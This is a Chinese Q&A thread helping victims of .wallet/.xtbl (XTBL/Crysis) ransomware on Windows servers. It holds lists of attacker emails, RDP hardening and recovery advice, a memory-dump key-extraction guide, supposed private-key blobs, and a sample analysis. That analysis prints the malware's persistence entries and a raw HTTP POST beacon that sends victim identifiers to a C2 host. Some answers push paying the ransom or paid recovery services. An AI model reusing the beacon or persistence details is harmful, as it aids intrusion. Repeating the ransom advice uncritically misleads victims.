服务器所有文件都变成.wallet后缀的文件,可能中了勒索病毒,该如何处理这个问题?

今天发现我的服务器上的某一个盘所有的文件都变成了wallet.后缀的文件,并且文件名中附有fly_goods@aol.com (这个邮箱?) 文件属性显示某月某号修改的文件,今天了解了一下很有可能中了勒索病毒,但是勒索病毒有很多种,请问如何确定到底是中了哪一种勒索病毒呢?该如何处理这个问题?交钱换取密钥可行吗? ps:已经发了邮件给该邮箱,TA暂时未回复我
关注者
152
被浏览
71435

24 个回答

病毒名称:XTBL(已经被卡巴斯基破解),wallet(数据库文件可以恢复2017年02月26日)
病毒类型:勒索病毒 (黑客勒索的不是法币,而是一种叫bitcoin的匿名货币)
作恶手法:AES或 RSA算法批量加密上百种后缀文件类型或者应用程序,并且把原来的文件名为xxxxx@aol.com.walletl 或者 xxxxx@ india.com.wallet
危险等级:★★★★★ (最高级别)
入侵手段:远程控制协议漏洞(RDP弱口令),远程密码泄露。
病毒特征:黑客留下了他们的联系方式在所有的被加密文件上,比如fly_goods@aol.com
如何预防:大家自己对症下药,先上防御杀毒,把历年所有未打齐的安全补丁打上(如果有条件还是上windows server 2016),修改远程控制账户密码,做好密码的管理工作,异地备份数据,异地备份数据,异地备份数据


2017年2月26日,国外论坛爆出,wallet病毒其实并不会对数据库文件进行加密,只是清空了文件头。 解决方法:Wallet病毒mdf,bak等数据库恢复的基本思路。 - 知乎专栏


(前提是,必须要有一个之前对应的未感染的备份,如mdf bak等备份均可以,备份日期无影响)



2017年2月7日爆料:
目前已知的黑客邮箱(数据统计)有:
injury@india.com
makedonskiy@india.com

stopper@india.com
destroed_total@aol.com
enterprise_lost@aol.com
fire.show@aol.com
first_wolf@aol.com
fly_goods@aol.com
gotham_mouse@aol.com
ice_snow@aol.com
joker_lucker@aol.com
mission_inposible@aol.com
nort_dog@aol.com
p_pant@aol.com
power_full@aol.com
war_lost@aol.com
sammer_winter@aol.com
tanksfast@aol.com
total_zero@aol.com
warlokold@aol.com
xmen_xmen@aol.com
danger_rush@aol.com
nort_folk@aol.com
support_files@india.com
age_empires@aol.com
amanda_sofost@india.com
ded_pool@aol.com
donald_dak@aol.com
space_rangers@aol.com
mkgoro@india.com
MKKitana@india.com
mkscorpion@india.com
mksubzero@india.com
Mkliukang@india.com
Mkraiden@india.com
spacelocker@post.com
legionfromheaven@india.com
mkjohnny@india.com
mkreptile@india.com
mksektor@india.com
mknoobsaibot@india.com
mkgoro@aol.com
MKKitana@aol.com
mkscorpion@aol.com
mksubzero@aol.com
Mkliukang@aol.com
Mkraiden@aol.com
spacelocker@post.com
legionfromheaven@aol.com
mkjohnny@aol.com
mkreptile@aol.com
mksektor@aol.com
mknoobsaibot@aol.com
mk.baraka@aol.com
mk.jax@aol.com
mk.sonyablade@aol.com
mk.shaokahn@aol.com
mk.smoke@aol.com

mserbinov@aol.com
webmafia@asia.com
stopper@india.com
crann@india.com
zaloha@india.com
bitcoin143@india.com
amagnus@india.com
destroed_total@aol.com
enterprise_lost@aol.com
fire.show@aol.com
first_wolf@aol.com
fly_goods@aol.com
gotham_mouse@aol.com
ice_snow@aol.com
joker_lucker@aol.com
mission_inposible@aol.com
nort_dog@aol.com
p_pant@aol.com
power_full@aol.com
war_lost@aol.com
sammer_winter@aol.com
tanksfast@aol.com
total_zero@aol.com
warlokold@aol.com
xmen_xmen@aol.com
danger_rush@aol.com
nort_folk@aol.com
support_files@india.com
age_empires@aol.com
amanda_sofost@india.com
ded_pool@aol.com
donald_dak@aol.com
space_rangers@aol.com
mkgoro@india.com
MKKitana@india.com
mkscorpion@india.com
mksubzero@india.com
Mkliukang@india.com
Mkraiden@india.com
spacelocker@post.com
legionfromheaven@india.com
mkjohnny@india.com
mkreptile@india.com
mksektor@india.com
mknoobsaibot@india.com
mkgoro@aol.com
MKKitana@aol.com
mkscorpion@aol.com
mksubzero@aol.com
Mkliukang@aol.com
Mkraiden@aol.com
spacelocker@post.com
legionfromheaven@aol.com
mkjohnny@aol.com
mkreptile@aol.com
mksektor@aol.com
mknoobsaibot@aol.com
mk.baraka@aol.com
mk.jax@aol.com
mk.sonyablade@aol.com
mk.shaokahn@aol.com
mk.smoke@aol.com
info@decrypt.ws
mk.rain@aol.com
mk.ermac@aol.com
mk.kabal@aol.com
mk.stryker@aol.com
mkgavrusha@aol.com
happydaayz@aol.com
d.fedor2@aol.com
k.matroskin@aol.com
mk.sharik@aol.com
Vegclass@aol.com
nomascus@india.com
meldonii@india.com
calipso.god@aol.com
ninja_gaiver@aol.com
alex-king@india.com
checksupport@163.com
grand_car@aol.com
ecovector2@aol.com
donald_dak@aol.com
seven_legion@aol.com
drow_ranger@india.com
centurion_legion@aol.com
batman_good@aol.com
systemdown@india.com
legioner_seven@aol.com
f_tactics@aol.com
last_centurion@aol.com
diablo_diablo2@aol.com
kartn@india.com
martezon@india.com
injury@india.com
supermagnet@india.com
magnetvec@india.com
webmafia@asia.com
smartsupport@india.com
interlock@india.com
lavandos@dr.com
mr_lock@mail.com
kuprin@india.com
breakdown@india.com

由此可见黑客并没有使用QQ或者126等中国人常用的邮箱,奇怪的是您上了国外的论坛 你可以发现 大部分黑客用的是QQ和163邮箱。黑客往往社会工程学做的非常好,难于找到他们本人。

Wallet勒索病毒来历:它是个很老牌的勒索病毒XTBL的升级版本(加密算法上更加严谨),XTBL病毒15年出现过几次,后来消失了,今年6月份后,又再次小规模在全球爆发,他们专门性的针对WINDOWS服务器进行破坏行为,直到2016年11月底,卡巴斯基释放出破解工具(请到这里下载https://noransom.kaspersky.com/ (请复制到游览器) ,XTBL被彻底消失在这个世界。

但是黑客在几天之内针对卡巴破解工具再次升级变种,今年12月大规模出现了wallet病毒,遗憾的是目前卡巴斯基没有找到wallet病毒的破解方法,如果有耐心的维护人员可以等待卡巴斯基爆出新工具,如果急的话,可能唯一的办法只能找黑客妥协,如果数据不着急使用,请随时关注https://noransom.kaspersky.com/


(这里不得不为卡巴斯基点赞,目前世界上大部分勒索病毒都是被卡巴实验室攻破,请大家给卡巴斯基一点时间,也可以支持下卡巴斯基,付费购买卡巴安全工具。)


2016年12月14日更新:
wallet病毒是怎么进入服务器的?
据了解是通过(RDP)远程桌面进来。
请使用弱密码的童鞋马上修改为强密码,避免出现更加严重的状况。
远程桌面协议(RDP)蛮力攻击我们应该关闭/禁用RDP不使用它。如果必须使用RDP,确保它是白名单的IP的防火墙或不暴露到互联网,把RDP协议隐藏在防火墙后面吧。

这是中毒后的服务器文件表面分析,如图所示:








如果你的文件很重要非常着急使用,可以找我处理,毕竟处理勒索病毒经验很重要,有需要的朋友来这里找我吧.RSA4096 随机5代码 .wallet后缀解密恢复 勒索病毒专业恢复



恢复数据的步骤:
1:先杀干净病毒

如果用免费的杀软,建议使用360http://360安全卫士11,目前可以查杀到加密病毒。如图

-注意-wallet病毒邮箱有2个india.com或者aol.com,那么会查杀到一个payload_xxxx.exe.

2:修改中毒前的RDP(远程桌面控制)弱口令(密码)
(有些童鞋说我的QWEasd!@#,这样的密码强不强,我只能说你老板给你开的工资太低了,用这样的口令和你开着门让黑客进来没区别)

3:恢复数据
A:XTBL请使用免费的卡巴斯基破解工具 media.kaspersky.com/uti(亲测有效,请在测试前备份避免损坏文件)
B:wallet作为XTBL的变种病毒,目前wallet加密数据目前没有破解工具,只能支付比特币给黑客处理(一般黑客报价是2个比特币,合计人民币11000元左右),如果你不急使用数据,请耐心等待卡巴斯基爆出,数据越急越需要注意风险,请找专业的有经验的人士处理。

恢复实例快照:这是一台70多万个文件被加密为fly_goods@aol.com.wallet后缀的服务器,通过购买私钥完成了60多万个文件的恢复,耗时4小时20分钟,估计全部恢复正常得要1-2天,恢复文件70万个大约要5个小时,重新配置服务器环境最少1天。------麻痹的黑客,exe应用你也加密。



)以下是XTBL之前的讨论,因为卡巴斯基的破解工具出现,下面的内容可以不加以更多时间去查阅。

(楼下有个答案是用dump的方法去获取私钥,我觉得你的方法是可以多次验证的,行不行,马上就能知道结果,因为你的加密程序xxxxxx.exe还在电脑里,你多运行一次不就能抓取内存了?根本不需要担心加密完成了与否,即使杀毒了没有了,同样可以验证你的方法行不行,到virustotal下载一个病毒样本,拿个新系统测试下就知道你的方法到底可行不可行,千万不要去拿中毒者的电脑多次实验,你自己的方法自己不能求证,如果行,你自己早就求证了,还要去帮别人,别吹牛逼好吗?你说不杀毒,玩意感染了其他共享位置的文件呢,不是更惨?你是哪家杀毒公司的?我不知道,但是你肯定在吹牛逼)
即使你是安全机构的 我也要送你一些话,看好了!别把方向搞错了!!





这个黑客的特征就是 ID 和 联系方式都改为文件名。。。
要价很高,但是谁人都清楚,攻击WIN系统服务器 还是黑客比较二的选择。
处理过几次,国内被墙的原因,我建议你用GMAIL和他联系。

不建议付款,因为数据重要的童鞋都不用WIN做服务器了。。 不知道我说的对不对!


2016年5月29日更新,近期发现很多童鞋的服务器中了xtbl,简单的拿了个案例溯源了下:1: 大部分中毒xtbl的童鞋是开启了WINDOWS原生的远程管理权限。2:大部分童鞋设置的远程管理员的密码过于简单,不够粗暴,记住密码要足够长,足够乱,最好你自己也记不住。。。!!3:服务器裸奔裸奔!!


下点猛料。
我希望知乎的朋友可以看到并且做出尝试。
尽力而为,不求凡事能解决,但求凡事做出必要的尝试,才会让更多人加入讨论和研究。


问:xtbl病毒到底能不能解决? (2016年11月底 卡巴斯基已经破解xtbl)


我的回答是:

我处理过几个,但是按照私钥长度来看,能够被同一个AES密钥加密的可能性非常低,按照我的理解,黑客是分布式分工作案,很有可能同一个黑客会用同一个公钥加密文件,好吧,很多人没理解我的意思,对吧? (人性相对于技术来说,是绝对公平的,甚至是毫无差异的,贪婪是人性的弱点,请看分析 )

我来解释下:

勒索病毒的利益链:

黑客头目A(病毒开发者)----->发放公钥给黑客B (漏洞挖掘者,各种邮箱就是这些B了)----->侵入电脑加密文件------->B要解密你的文件,会收取到中毒者赎金,然后必须找到A买回私钥,所以亮点来了,贪婪的B 为了不给A获取到所有的勒索金额,而放弃使用A提供新的公钥,继续使用前面一个中毒者的公钥继续加密另外一台电脑,所以如果所有的黑客B都是贪婪的,那么我下面的内容或许可以帮到你,你可以尝试下是否可以解密你的文件,如果帮不到,那么我表示抱歉,我能做的只能那么多)

但是接触那么多邮箱的黑客。。发现他们没有共性。。艹。


我处理过的案例 : 私钥共享

/8z/qwPOc3o9tX2iB+ZH18OA6W6aoGtd/heHufZsglNWmlP3ZImUYu+0pb31j9P8UFcv7ugmngsrLwgFseusMI+6jaIsWuT2l2S/KSqzgG9M//4FGCfYKS2SXIz9flYxiN+biIVVqpT+4bYb+v5in525WmZ+O8Dr7F7BWKqp0QV7tCmycuH590ntdPYtdkgMrwgavgPZ1/Cu9nMTigfyWZ16KWL/zP+r

/8z/q5x83xBifoYAs6JvVgqk7HeY9P5R4JeuH7ljqR3WQldj+F5TZRIxPo1dR8qkHSIy4DQT0jlhNu6NqFyuuxwUu+dr2xIebIbXm2gyMQAVTEWULGXjlbhJ320kA5zoQ7FgUZVCPnnjhMtbAFpAjTq6KoMA2X+qq+ze9XQX7XB68cdVentZ0i6cBbKJR0CFk0r1ZfOL4ILe2KRuPqW09BVaH1n/zP+r


/8z/q4SaWans/vwtEYHTEEhu+NS15SokexG2MrgkMXmUy1wjE28hlbJT2n/n+9asd/Pdz/1/WNSTeCQJ3gGLfCyi1wQz3zv5TA47gh1/CHhsYScrWMMJVhTfUfFotnUMqOrie9uhn1cFO1z3x1EsHsdFo6rX16FLXEsEA6BZThBF9zrfJWXkI/R0hPm40XJX/kxP6GJk15hwYDAWruUT98c2tL+zewonQ1d9WKvIVP1a5boju+5Z4aZn4WFG+ss/TRmMcN33S1V0sSWl9IFTTKQFxXsC4r4Fe2z6yTV/RkJxIdhpYc9AwRp45BfXGLsRym7y5xrWtU3AMYIf8WlxTWenpHNVbLIV5zkohWtpOqKLV8AmlDAFiJGh0Fszv1jOIbtG66ESGWjk099YHyBWakgLzUt07aIfZjMiK4l/4KudotP4tF3vofVVyy6fdgwGH9WOE89u7YY9wl44eQ6qJOOG0jJMaAoI2Yb8zcnIYfKhrX1vj8vv+uZOShLK50/vZbHOFVEIOrq2IrpmgTzQSjE1mfgKLbu+cX/bsvKXvU2eV13fAVHBqqTSkrobdD1tLvYBc9y1IvVoT3rDAu/DqwnGJHGLfdrpVmdUP0vwWhC2hFl7nYYDJQ4zCO2cL1mZWrFeZP/M/6s=

/8z/qwRyoxI3mBEm5Sw5dEJcTx6mQkkoMxSNopjRW8t1efSHSU9/dXrp9f7sLWMWOvYgbGFF3jxiSpxyH8nXCEKB3mqYz2agU2VYO3UyFagDi8sBnrtPiB8krdoY+jrFFqXMKAtF4box7ad6GS8Enfr1+NaJMzIaaF6b9m82KlYkzjiGOMlcnvM9154fN99c7HFW0nluo9u5z6MobNHr0x3aE0//zP+r


以上4个私钥是用了接近5万元人民币购买的。。
(测试反馈:显然大部分中毒者的文件并不能通过上面几个共享的私钥进行解密。)
作者:damoncare
链接:服务器某个盘的所有文件都变成xtbl后缀的文件,可能中了勒索病毒,该如何处理这个问题? - damoncare 的回答
来源:知乎
著作权归作者所有,转载请联系作者获得授权。




中了勒索病毒,严禁关机重启,严禁使用杀毒软件。一旦勒索病毒进程终止退出,解密密钥很可能就再也找不回来了(只能向黑客求助了)。

首先要做的应该是内存取证,就是把当前系统内存或勒索病毒内存保存下来。
如果没有关机或重启,并对系统内存做了取证,可以向我求助。




=====================================================
《xtbl勒索病毒自救手册》
日期:2016年7月21日
作者:知乎damoncare

中了xtbl勒索病毒,严禁使用杀毒软件,严禁关机或重启。否则,将导致病毒内存丢失,密钥也因此丢失。

正确的做法是,找到病毒进程(不一定是space.exe),用“Process Explorer”创建病毒进程的dump文件。

“Process Explorer”官方下载地址:download.sysinternals.com

步骤一,右键--Create Dump--Create Full Dump。



步骤二,用“DiskGenius”找到系统盘(通常是C盘)的卷序列号用于定位密钥。



步骤三,用16进制编辑器搜索找到的序列号,序列号上面32字节即为文件加解密密钥。


=====================================================



+++++++++++++++++++++++++++++++++++++++++++++++++++
《样本分析》
样本:space.exe
Md5:2D074CEB8DB705E1A2BDCC50918261FF

VirusTotal信息:
virustotal.com/en/file/


字符串:
0000000097A8 00000040ABA8 0 C:\crysis\Release\PDB\payload.pdb



文件行为:
CREATE C:\WINDOWS\System32\space.exe
CREATE C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\space.exe



注册表行为:
SetValue HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wmkvvbvr "C:\WINDOWS\System32\space.exe"




网络行为:
CC地址tuginsaat.com(93.89.224.41:80)
TCP CONNECT 127.0.0.1 => 93.89.224.41:80


/////////////////
POST /wp-content/themes/twentythirteen/srgprk/pass/index.php HTTP/1.0
Host: tuginsaat.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 165

submit=submit&id=SRGPRK-A5AF01FC671CBE9F743C4AFA03ED5762D4921DEB&guid=2033C24E-D4FAD77EDF0A76D2B6E4E2725AAE35CB24A9B2FA&pc=ADMIN-318AB4636&mail=space_rangers@aol.com
//////////////////


submit=submit
id=SRGPRK-A5AF01FC671CBE9F743C4AFA03ED5762D4921DEB
(可以理解为变种id或犯罪组织下线id,代号“SRGPRK”,公钥的sha1“A5AF01FC......”)
guid=B153CE4D-1694E81716A85714E356EC6AD7BC30EEC9F6F752
(受害者id,卷序列号“B153CE4D”,随机数“1694E8171.........”)
pc=ADMIN-34534324
(计算机名)
mail=space_rangers@aol.com
(联系邮箱)



加密文件(***.space_rangers@aol.com.xtbl)格式:

+++++++++++++++++++++++++++++++++++++++++++++++++++





2016.7.21-18:40更新:
本想研究下它的随机数生成器有没有弱点,看能不能枚举或预测。它的种子有256位,使用了多种当前系统状态,使用了sha1算法,目前来看不能枚举或预测。结论还是那样,如果关机或重启就没办法了。



2016.7.22-14:45更新:
在帮网友处理的过程中发现,勒索病毒在加密完文件之后,会把内存中的密钥清零。如果等它把所有的文件都加密完,再取的dump也还是找不到解密密钥。所以即使取到dump,能得到密钥的几率似乎也很小。
我自己测试的时候解密成功了,是因为还没等它加密完所有文件,我就取了dump。所以取到了内存中的密钥。



2016.7.22-15:14更新:
不再接受网友求助。因为,目前为止有2位网友成功取到dump文件,我发现当恶意代码加密完所有的文件后,会把加密密钥在内存中抹掉。因此恢复不了。只能用私钥解密rsa-1024加密过的“文件加密(aes-256-cbc)密钥”。而私钥只会在攻击者手上,谁都没有办法。